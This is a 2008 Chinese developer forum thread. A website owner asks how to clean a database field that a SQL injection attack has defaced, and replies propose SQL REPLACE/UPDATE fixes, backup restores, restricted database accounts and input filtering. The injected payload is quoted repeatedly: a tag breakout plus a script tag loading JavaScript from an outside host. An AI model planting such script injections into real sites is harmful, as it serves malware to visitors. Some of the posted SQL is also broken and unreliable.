紧急求助,数据被注入了,如果把数据库的数据改回来?

kaqia2003 2008-05-16 10:22:44
数据库某个字段的内容原来是XXXXX
现在全被改为XXXXX+"></"></title><script src=http://s.see9.us/s.js></script><!--

现在如果用sql语句改回来

紧求助啊。
...全文
153 21 打赏 收藏 转发到动态 举报
写回复
用AI写文章
21 条回复
切换为时间正序
请发表友善的回复…
发表回复
datahandler2 2008-05-16
  • 打赏
  • 举报
回复
应该是病毒
kaqia2003 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 13 楼 0xff 的回复:]
补充一下:
现在的asp.net网站普遍存在注入漏洞的地方是有分页内容显示的页面,因为网上通用的分页存储过程都是采用重组SQL语句的方式来实现的。

如果要增加防注入模块的话,这些页面应为重点.
[/Quote]

你说的这点要如何入手?
kaqia2003 2008-05-16
  • 打赏
  • 举报
回复
0xff,你说的
要从根本上解决,一是修改程序,二是配置SQL帐号权限,将网站前台使用的SQL帐号配置为只读的权限.

将网站前台的sql帐号配置为只读的权限,那么交互性访问写入的数据有影响吗?
xjbx 2008-05-16
  • 打赏
  • 举报
回复
是呀,这不是sql注入的问题,是中毒了
0xff 2008-05-16
  • 打赏
  • 举报
回复
补充一下:
现在的asp.net网站普遍存在注入漏洞的地方是有分页内容显示的页面,因为网上通用的分页存储过程都是采用重组SQL语句的方式来实现的。

如果要增加防注入模块的话,这些页面应为重点.

netfeel2008 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 9 楼 5653325 的回复:]
最好还是检查检查代码
临时改回来是治标不治本的。
看看代码里面那个地方有被注入的漏洞
找些安全方面的书看看吧
[/Quote]
同情
0xff 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 winner2050 的回复:]
拜托你。这个不是被注入。

是服务器中病毒了,要关心一下病毒的行情好不好。
[/Quote]

不要误导别人好不好...
就算是中毒,也是发起攻击的服务器中毒,而不是被攻击的服务器中毒了.
从杀毒着手是解决不了这个问题的.

LZ最好还是从最近的备份里恢复被注入字段的数据.
(前些天我也是碰到这样情况,部分字段被覆盖)

恢复数据只能一时半会,一天之内肯定会被再次注入的...
要从根本上解决,一是修改程序,二是配置SQL帐号权限,将网站前台使用的SQL帐号配置为只读的权限.
tuyanhu 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 winner2050 的回复:]
拜托你。这个不是被注入。

是服务器中病毒了,要关心一下病毒的行情好不好。
[/Quote]
最近很多人中这种的了
踏平扶桑 2008-05-16
  • 打赏
  • 举报
回复
最好还是检查检查代码
临时改回来是治标不治本的。
看看代码里面那个地方有被注入的漏洞
找些安全方面的书看看吧
hackztx 2008-05-16
  • 打赏
  • 举报
回复
create table test
(
name varchar(50)
)

insert into test values ('abc')
select * from test--abc
update test set name=replace(name,'b','bbb')

select * from test--abbbc

--drop table test
hackztx 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 5 楼 kaqia2003 的回复:]
引用 1 楼 hackztx 的回复:
update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')



这个执行了好像没效果,谁能来解释一下。
[/Quote]

不知道你给的替换字符串是否正确


例子如下:

create table test
(
name varchar(50)
)

insert into name values ('abc')

update test set name=replace('b','bbb')

select * from name//abbbc
winner2050 2008-05-16
  • 打赏
  • 举报
回复
拜托你。这个不是被注入。

是服务器中病毒了,要关心一下病毒的行情好不好。
kaqia2003 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 1 楼 hackztx 的回复:]
update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')
[/Quote]


这个执行了好像没效果,谁能来解释一下。
Teng_s2000 2008-05-16
  • 打赏
  • 举报
回复
同情啊
lockepeak 2008-05-16
  • 打赏
  • 举报
回复
update yourtable set Textfiled=‘XXXXX+...’ where Textfiled=‘XXXXX'
勿腻阳 2008-05-16
  • 打赏
  • 举报
回复
update 数据表名称 set 字段名称=‘XXXXX’ where 字段名称=‘XXXXX+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ’
hackztx 2008-05-16
  • 打赏
  • 举报
回复
update tab set column1 =replace(column1,'+"> </"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ','')

0xff 2008-05-16
  • 打赏
  • 举报
回复
还有一种方案,就是加上一个UrlReWrite,检查URL是否包含非法关键字。
kaqia2003 2008-05-16
  • 打赏
  • 举报
回复
[Quote=引用 19 楼 0xff 的回复:]
要彻底解决的话还是要把所有的漏洞都补上的,就看采用何种方式了,最好是能结合修改程序和配置SQL权限做到双重安全...

如果程序漏洞太多,修补程序代价太大,则可以考虑把交互部分独立出来,使用有部分写入权限的SQL帐号,但要同时修补这部分程序的注入漏洞.
[/Quote]
唉,真是头疼的问题,很大部分程序是前面的人写的。修改程序还得看原来的人写的代码,有什么比较彻底的方法能杜绝这种现在的再次发生,比如系统方面的措施.
0xff 2008-05-16
  • 打赏
  • 举报
回复
要彻底解决的话还是要把所有的漏洞都补上的,就看采用何种方式了,最好是能结合修改程序和配置SQL权限做到双重安全...

如果程序漏洞太多,修补程序代价太大,则可以考虑把交互部分独立出来,使用有部分写入权限的SQL帐号,但要同时修补这部分程序的注入漏洞.
加载更多回复(1)

62,074

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧